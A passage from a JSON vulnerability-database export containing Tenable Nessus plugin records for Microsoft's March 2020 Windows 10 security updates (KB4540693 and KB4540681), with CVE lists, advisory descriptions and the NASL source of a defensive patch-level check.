(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0823, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540693: Windows 10 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0786", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0814", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-0833", 
"CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540693.NASL", "href": "https://www.tenable.com/plugins/nessus/134373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134373);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0786\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0814\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n 
\"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540693\");\n script_xref(name:\"MSFT\", value:\"MS20-4540693\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540693: Windows 10 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540693.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. 
(CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information disclosure vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. 
(CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. 
(CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a user's system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. 
An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the\n Windows Tile Object Service improperly handles hard\n links. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. 
(CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. 
If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323,\n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831)\");\n # https://support.microsoft.com/en-us/help/4540693/windows-10-update-kb4540693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0759ed88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540693.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540693');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540693])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:29:46", "description": "The remote Windows host is missing security update 4540681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device 
Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. 
A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. 
The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0762)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. 
An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
